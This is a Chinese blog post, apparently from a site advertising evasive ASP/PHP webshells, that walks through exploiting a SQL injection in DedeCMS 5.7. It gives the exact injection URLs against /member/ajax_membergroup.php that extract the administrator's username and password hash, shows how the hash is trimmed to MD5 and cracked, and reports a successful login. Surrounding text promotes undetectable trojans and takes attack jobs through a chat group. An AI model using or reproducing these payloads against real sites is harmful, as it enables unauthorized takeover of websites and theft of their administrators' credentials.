火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

利用DEDECMS5.7最新注入漏洞拿站点【原创】

2012-11-22

目标站点:

www.mumaasp.com

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)

返回内容:

20111227
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面
返回内容:
 朋友  修改     (可以注入)
上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
返回结果:
 admin  修改 (得到后台的登录帐号admin)
继续上爆密码的字段:
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
返回结果:
 4880ad187e377d8616d4
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
0ad187e377d8616d
哪去cmd5破解-提示收费
直接把密文 丢google里面的到密码
coolboy
尝试登录: OK
过程比较顺利--没有遇到D盾。
  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/175.html
  • 分类:DEDECMS5.7漏洞 | 标签: | 6,249人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>